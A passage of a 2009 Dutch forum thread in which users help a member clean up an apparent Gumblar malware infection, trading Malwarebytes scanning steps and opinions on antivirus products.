    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:42:21 #53
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786682
    Ik ben benieuwd wat avast wel of niet vindt iig
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786717
    Volgens mij tot nu toe nog niks
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:46:15 #55
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786777
    quote:
    Op dinsdag 11 augustus 2009 12:43 schreef MissBliss het volgende:
    Volgens mij tot nu toe nog niks
    Hij hoeft ook niet perse op jouw pc te staan Hij kan ook op die van RE staan... want toegang tot netwerk.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 12:46:41 #56
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71786785
    quote:
    Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    Handig om daar op te klikken..

    Overigens heb ik ervaren dat Malwarebytes Anti-Malware (vrij klein en gratis) erg goed werkt tegen deze hardnekkige dingen. Maar goed dit is ook nieuw voor me. Gelukkig zit ik nu op m'n Apple'tje werken..

    [ Bericht 3% gewijzigd door Mr.Noodle op 11-08-2009 12:55:34 ]
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 12:47:54 #57
    262 Re
    Kiss & Swallow
    pi_71786806
    homepage is iig veranderd naar goolge

    ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
    04-08-11, 02-02-12, 20-06-14, 13-08-15
    pi_71786854
    quote:
    Op dinsdag 11 augustus 2009 @ 12:46 schreef Qwea het volgende:

    [..]

    Hij hoeft ook niet perse op jouw pc te staan Hij kan ook op die van RE staan... want toegang tot netwerk.
    Oh
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71787174
    quote:
    Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

    [..]

    Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Ok.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
    pi_71787191
    Probeer dit dan maar.

    Updaten en scannen met Malwarebytes' Anti-Malware
  • Start MalwareBytes AntiMalware (Vista gebruikers > rechtermuisknop kies uitvoeren als Admin).
  • Draai Malwarebytes' Anti-Malware niet in safemode, dan anders aangegeven.


    Update Malwarebytes' Anti-Malware
  • Selecteer de "Update" tab.
  • Klik op "Controleer Updates".
  • Wanner het updaten klaar is, selecteer de "Scanner" tab.
  • Klik "Volledige Scan".
  • Wanneer het scannen voltooid is, klik op "OK", en ga naar de resultaten lijst.
  • Bij de resultatenlijst, selecteer alles en klik op "Verwijderen".
  • Na een succesvolle scan, een log zal automatisch worden geopend in Notepad. Kopieer en plak deze log en zet het in je volgende reply.
  • Klik je de log om de één of andere reden weg, dan kun je hem hier weer vinden:
  • C:\Documents and Settings\[gebuikersnaam]\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs
  • █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:03:44 #61
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787197
    quote:
    Op dinsdag 11 augustus 2009 12:47 schreef Re het volgende:
    homepage is iig veranderd naar goolge

    ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
    ! En die helpdesk is nog steeds niet langs geweest?

    Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:04:32 #62
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787215
    quote:
    Op dinsdag 11 augustus 2009 12:49 schreef MissBliss het volgende:

    [..]

    Oh
    Das het mooie van een netwerk. Stel je heb 500 comps in dat netwerk, en 1 van die 500 is besmet, dan kan dat virus bij alles van het netwerk. Dus ook bij de ftp gegevens.

    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787289
    quote:
    Op dinsdag 11 augustus 2009 @ 13:03 schreef CantFazeMe het volgende:
    Probeer dit dan maar.

    Updaten en scannen met Malwarebytes' Anti-Malware
  • Start MalwareBytes AntiMalware (Vista gebruikers > rechtermuisknop kies uitvoeren als Admin).
  • Draai Malwarebytes' Anti-Malware niet in safemode, dan anders aangegeven.


    Update Malwarebytes' Anti-Malware
  • Selecteer de "Update" tab.
  • Klik op "Controleer Updates".
  • Wanner het updaten klaar is, selecteer de "Scanner" tab.
  • Klik "Volledige Scan".
  • Wanneer het scannen voltooid is, klik op "OK", en ga naar de resultaten lijst.
  • Bij de resultatenlijst, selecteer alles en klik op "Verwijderen".
  • Na een succesvolle scan, een log zal automatisch worden geopend in Notepad. Kopieer en plak deze log en zet het in je volgende reply.
  • Klik je de log om de één of andere reden weg, dan kun je hem hier weer vinden:
  • C:\Documents and Settings\[gebuikersnaam]\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs
  • Ga ik doen zodra avast klaar is
    81% nu.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 13:09:23 #64
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71787333
    Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.

    aVast doet hier trouwens niet veel tegen..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:11:33 #65
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787394
    quote:
    Op dinsdag 11 augustus 2009 13:09 schreef Mr.Noodle het volgende:
    Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.

    aVast doet hier trouwens niet veel tegen..
    Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787408
    Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)

    Maar het is een zeer goed programma.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:13:56 #67
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787455
    quote:
    Op dinsdag 11 augustus 2009 13:11 schreef CantFazeMe het volgende:
    Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)

    Maar het is een zeer goed programma.
    Die is toch ook actief
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787490
    quote:
    Op dinsdag 11 augustus 2009 13:13 schreef Qwea het volgende:

    [..]

    Die is toch ook actief
    Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:17:14 #69
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787538
    quote:
    Op dinsdag 11 augustus 2009 13:15 schreef CantFazeMe het volgende:

    [..]

    Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
    Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

    Voor gewone bescherming draait ze op dr eigen pc avast.

    Wat draai je eigenlijk op die andere machines MB?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787556
    Avast is klaar, niks gevonden
    (Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.

    Nu ga ik dat malwarebytes eens proberen.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71787582
    quote:
    Op dinsdag 11 augustus 2009 @ 13:17 schreef Qwea het volgende:

    [..]

    Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

    Voor gewone bescherming draait ze op dr eigen pc avast.

    Wat draai je eigenlijk op die andere machines MB?
    De minilaptop heeft AVG (heet dat zo?) en die van Re weet ik niet. Minilaptop heb ik nog niet aangehad, nog geen zin in
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:19:16 #72
    105263 Litso
    Interlectueel.
    pi_71787592
    quote:
    Op dinsdag 11 augustus 2009 12:35 schreef Qwea het volgende:

    [..]

    Download ff avast. Ik snap het niet he...

    Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"
    Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht
    "Dat is echt ontzettend zielig" ©
      Redactie Games dinsdag 11 augustus 2009 @ 13:19:39 #73
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71787604
    quote:
    Op dinsdag 11 augustus 2009 13:11 schreef Qwea het volgende:

    [..]

    Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.
    aVast doet dan half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:19:55 #74
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787608
    quote:
    Op dinsdag 11 augustus 2009 13:17 schreef MissBliss het volgende:
    Avast is klaar, niks gevonden
    (Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.

    Nu ga ik dat malwarebytes eens proberen.
    verwijder ze in veilige modus? Hier ook wel eens gehad... en dan doettie het wel.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:20:52 #75
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787648
    quote:
    Op dinsdag 11 augustus 2009 13:19 schreef Mr.Noodle het volgende:

    [..]

    aVast doet half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.
    aah oke. Kijk, das nieuw voor moi. Maar je kan de backup toch handmatig verwijderen?

    Trouwens MB, die malware bytes, voer die idd even op je gehele netwerk uit en niet enkel op je eigen pc.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787670
    quote:
    Op dinsdag 11 augustus 2009 13:17 schreef Qwea het volgende:

    [..]

    Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

    Voor gewone bescherming draait ze op dr eigen pc avast.

    Wat draai je eigenlijk op die andere machines MB?


    Dat bedoel ik dus. (lets go back ontopic.)
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:22:08 #77
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787697
    quote:
    Op dinsdag 11 augustus 2009 13:19 schreef Litso het volgende:

    [..]

    Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht
    Avast zou ik sowieso als virusscanner gebruiken, maar aangezien die bij MB niks vindt, probeer ook ff die malware bytess

    Avast is tot nu toe de enige die ik heb meegemaakt die je weghaald bij de bad iframes. De rest geeft geen kick
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:22:37 #78
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787711
    quote:
    Op dinsdag 11 augustus 2009 13:21 schreef CantFazeMe het volgende:

    [..]



    Dat bedoel ik dus. (lets go back ontopic.)
    Dat weet ik wel je zei het alleen zo moeilijk
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787741
    Even opnieuw opstarten, de J schijf is verdwenen

    Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:25:50 #80
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787818
    quote:
    Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
    Even opnieuw opstarten, de J schijf is verdwenen

    Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
    Ik persoonlijk zou het heel omslachting doen (thats my middle name ) en die malware bytes op een schijfje zetten en individueel op alle pc's draaien .
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:26:49 #81
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787851
    aah, er is druk iemad bezig met je site weer ok te maken zie ik
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:26:55 #82
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71787853
    quote:
    Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
    Even opnieuw opstarten, de J schijf is verdwenen

    Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
    Netwerk scannen heeft niet echt veel zin als andere PC's ook Windows draaien. Trojans/virussen/malware nestelen zich 99% op de schijf waar Windows op geïnstalleerd is, meestal is dat door andere gebruikers niet toegankelijk via het netwerk. Tenzij de Admin erbij kan komen...

    Rest alleen dat er op elke computer dat progje geïnstalleerd moet worden. Maar goed, kijk eerst even of het bij jezelf werkt voordat je aan de rest begint..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:27:01 #83
    22273 Dizer
    Save the beard!
    pi_71787857
    quote:
    Op dinsdag 11 augustus 2009 12:30 schreef Qwea het volgende:

    [..]


    [..]

    Flash en adobe reader.
    [..]


    [..]

    Ik vraag me af waarom vista niet.

    overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten

    Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
    Ok maar begrijp ik hieruit dat:

    Je besmet bent.
    Je de virus weghaald.
    Je website vernieuwd
    Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?


    Wat is het leven toch heerlijk met een Mac .
    Friends don't let friends remain beardless...
      dinsdag 11 augustus 2009 @ 13:31:10 #84
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787968
    quote:
    Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:

    [..]

    Ok maar begrijp ik hieruit dat:

    Je besmet bent.
    Je de virus weghaald.
    Je website vernieuwd
    Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?


    Wat is het leven toch heerlijk met een Mac .
    Ja. Als je het virus weghaalt, en je hebt een scanner die niet de bad iframes detecteerd (norton deed dat dus mooi niet gisteren) dan raak je opnieuw infected als je bv pietjepuk.nl bezoekt en die is besmet. Avast die ik heb, geef complete alarm bellen en dan heb je de keuze tussen doorgaan (en dus besmet worden) of de connectie afbreken zodat het iframe niet geladen wordt
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:34:22 #85
    262 Re
    Kiss & Swallow
    pi_71788071
    quote:
    Op dinsdag 11 augustus 2009 13:03 schreef Qwea het volgende:

    [..]

    ! En die helpdesk is nog steeds niet langs geweest?

    Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
    mja, netwerk is hier wel redelijk goed beveiligd, hangen 25.000 computers aan ofzo, laptop ligt nu bij IT
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 13:35:18 #86
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788091


    Dat geeft avast dus aan... als er een bad iframe is
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:35:45 #87
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788106
    Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:36:52 #88
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788137
    quote:
    Op dinsdag 11 augustus 2009 13:35 schreef Mr.Noodle het volgende:
    Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.
    Maar je wilt niet weten hoeveel mensen die zooi nog gebruiken. Nieuwe comps worden grotendeels met mcafee geleverd.

    Donderdag nieuwe laptop gehaald ; mcafee zat erop

    Gelijk er maar afgelikkerd.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      FOK!-Schrikkelbaas dinsdag 11 augustus 2009 @ 13:37:18 #89
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71788154
    Maar die moet dan toch gebruik maken van een enorm gat in je browser?
      dinsdag 11 augustus 2009 @ 13:38:04 #90
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788182
    quote:
    Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
    Maar die moet dan toch gebruik maken van een enorm gat in je browser?
    Nee, in adobe dus. Want via adobe komt het binnen.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:38:37 #91
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788205
    quote:
    Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:

    [..]

    Wat is het leven toch heerlijk met een Mac .
    Ja, het scheelt je iig (tot nu toe) dit soort frustraties..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      Redactie Games dinsdag 11 augustus 2009 @ 13:39:19 #92
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788232
    quote:
    Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
    Maar die moet dan toch gebruik maken van een enorm gat in je browser?
    Via de Adobe plugins waarvan je browser gebruik maken..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:40:35 #93
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788278
    quote:
    Op dinsdag 11 augustus 2009 13:39 schreef Mr.Noodle het volgende:

    [..]

    Via de Adobe plugins waarvan je browser gebruik maken..
    Dat dus idd

    Nou snap ik nog steeds niet waarom vista er niet bij staat. Als infected platforms
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71788311
    quote:
    Op dinsdag 11 augustus 2009 @ 13:25 schreef Qwea het volgende:

    [..]

    Ik persoonlijk zou het heel omslachting doen (thats my middle name ) en die malware bytes op een schijfje zetten en individueel op alle pc's draaien .
    Ok
    Ja goed idee wel

    Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
    quote:
    Op dinsdag 11 augustus 2009 @ 13:26 schreef Qwea het volgende:
    aah, er is druk iemad bezig met je site weer ok te maken zie ik
    Ja?
    Ik durf er niet meer te kijken
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 13:42:11 #95
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788324
    Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren is omdat mensen niet normaal aan het werk kunnen..

    sorry..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:42:52 #96
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788341
    quote:
    Nieuwe kampioen

    Volgens ScanSafe is Gumblar erger dan Conficker, een worm die zich verspreidt via een gat in Windows, om vervolgens namaak antivirussoftware te installeren en de echte uit te schakelen. Gumblar was de eerste twee weken van deze maand goed voor veertig procent van de malware die werd geblokkeerd door ScanSafe.

    De worm gedraagt zich anders dan Conficker, hij dringt dieper binnen en onderschept en monitort het webverkeer. Daarnaast wordt er een Trojaans paard geïnstalleerd dat data zoals wachtwoorden en gebruikersnamen steelt, aldus Cnet.
    Nou is het duidelijk dat het ftp gegevens steelt... maar in het stukje hier boven staat " wachtwoorden en gebruikers namen" dus dat geldt ook voor e-mail e.d?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:43:24 #97
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788360
    quote:
    Op dinsdag 11 augustus 2009 13:41 schreef MissBliss het volgende:

    [..]

    Ok
    Ja goed idee wel

    Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
    [..]

    Ja?
    Ik durf er niet meer te kijken
    Ja je site is fucked up, dus ik neem aan dat iemand ermee bezig is
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71788396
    quote:
    Op dinsdag 11 augustus 2009 @ 13:42 schreef Mr.Noodle het volgende:
    Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..

    sorry..
    Ik vind het ook zeer hilarisch.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71788408
    quote:
    Op dinsdag 11 augustus 2009 @ 13:43 schreef Qwea het volgende:

    [..]

    Ja je site is fucked up, dus ik neem aan dat iemand ermee bezig is
    Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:45:41 #100
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788430
    quote:
    Op dinsdag 11 augustus 2009 13:42 schreef Mr.Noodle het volgende:
    Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..

    sorry..
    Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is

    Ik vind het werkelijk een KUT vrius
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:46:24 #101
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788451
    quote:
    Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:

    [..]

    Ik vind het ook zeer hilarisch.
    Stiekem leef ik ook wel met je mee hoor..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:46:26 #102
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788454
    quote:
    Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:

    [..]

    Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?
    ik krijg geen bad iframe melding

    Trouwens, je stickje (usb) ga je in je mini laptop proppen, scan je die dan ook gelijk even mee?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71788493
    Formateren die zooi,je blijft toch altijd met rotzooi zitten,
    Damn,wat ben ik blij dat er ook gwn linux bestaat!
    Vooral dat wat hier boven staat.
      dinsdag 11 augustus 2009 @ 13:47:53 #104
    111829 MissBliss
    Godin van SHO
    pi_71788504
    quote:
    Op dinsdag 11 augustus 2009 @ 13:46 schreef Qwea het volgende:

    [..]

    ik krijg geen bad iframe melding

    Trouwens, je stickje (usb) ga je in je mini laptop proppen, scan je die dan ook gelijk even mee?
    Het stickje? Ja, die zal ik ook scannen
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:48:19 #105
    105263 Litso
    Interlectueel.
    pi_71788520
    Wat een gruwelijk gebruiksonvriendelijk is Avast eigenlijk zeg.
    "Dat is echt ontzettend zielig" ©
      dinsdag 11 augustus 2009 @ 13:49:53 #106
    262 Re
    Kiss & Swallow
    pi_71788577
    quote:
    Op dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:

    [..]

    Het stickje? Ja, die zal ik ook scannen
    je CF en SD kaartje er al uitgehaald
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 13:50:15 #107
    111829 MissBliss
    Godin van SHO
    pi_71788588
    quote:
    Op dinsdag 11 augustus 2009 @ 13:47 schreef amvrosios het volgende:
    Formateren die zooi,je blijft toch altijd met rotzooi zitten,
    Damn,wat ben ik blij dat er ook gwn linux bestaat!
    Ja doei
    Dat doe ik over een week wel als het dan nog niet weg is
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:50:44 #108
    111829 MissBliss
    Godin van SHO
    pi_71788604
    quote:
    Op dinsdag 11 augustus 2009 @ 13:49 schreef Re het volgende:

    [..]

    je CF en SD kaartje er al uitgehaald
    Nu wel

    iPhone ook maar?
    Oh nee, das van Apple
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:51:10 #109
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788614
    quote:
    Op dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:

    [..]

    Het stickje? Ja, die zal ik ook scannen
    si
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:51:28 #110
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788626
    quote:
    Op dinsdag 11 augustus 2009 13:48 schreef Litso het volgende:
    Wat een gruwelijk gebruiksonvriendelijk is Avast eigenlijk zeg.
    vind je???

    Ik vind het echt een ideale scanner
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:52:09 #111
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788649
    quote:
    Op dinsdag 11 augustus 2009 13:50 schreef MissBliss het volgende:

    [..]

    Nu wel

    iPhone ook maar?
    Oh nee, das van Apple
    iphone heeft een ander besturingssysteem

    scan ook maar je sd kaartjes
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:55:01 #112
    111829 MissBliss
    Godin van SHO
    pi_71788734
